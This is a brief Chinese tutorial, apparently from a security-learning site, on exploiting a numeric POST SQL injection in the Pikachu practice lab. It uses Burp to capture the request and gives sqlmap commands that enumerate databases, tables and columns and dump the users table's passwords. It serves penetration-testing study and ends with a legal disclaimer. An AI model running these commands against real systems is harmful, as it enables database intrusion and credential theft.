SQL注入漏洞
主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)
数字型注入(post)
一
二
利用sqlmap跑
- 首先,开burp截包。
- 输入1,提交。可以看见,burp已经把id获取到了
- 复制到文件,保存为txt文件。
打开sqlmap
- sqlmap -r 1.txt
获取所有数据库
- sqlmap -r 1.txt –dbs
获取pikachu下所有的表
- sqlmap -r 1.txt -D pikachu –tables
获取users下所有的列
- sqlmap -r 1.txt -D pikachu -T users –columns
获取列password下的内容
- sqlmap -r 1.txt -D pikachu -T users -C “password” –dump
在局域网环境进行,切勿用于非法用途
声明:
切勿使用在本网站学习的方法攻击其他计算机,保护网络安全,人人有责,做一个维护网络安全的人。
该网站编写此类文章的目标是为了让渗透测试爱好者在学习过程中更好的掌握技巧和方法同时也让广大网民了解黑客是如何对互联网进行攻击的从而更好的保护网络财产安全,如果使用在本站学习的方法和技击其他计算机的造成的后果自负,与本站无关,学技术不是为了搞破坏,而是为了更好的去保护我们祖国的网络安全!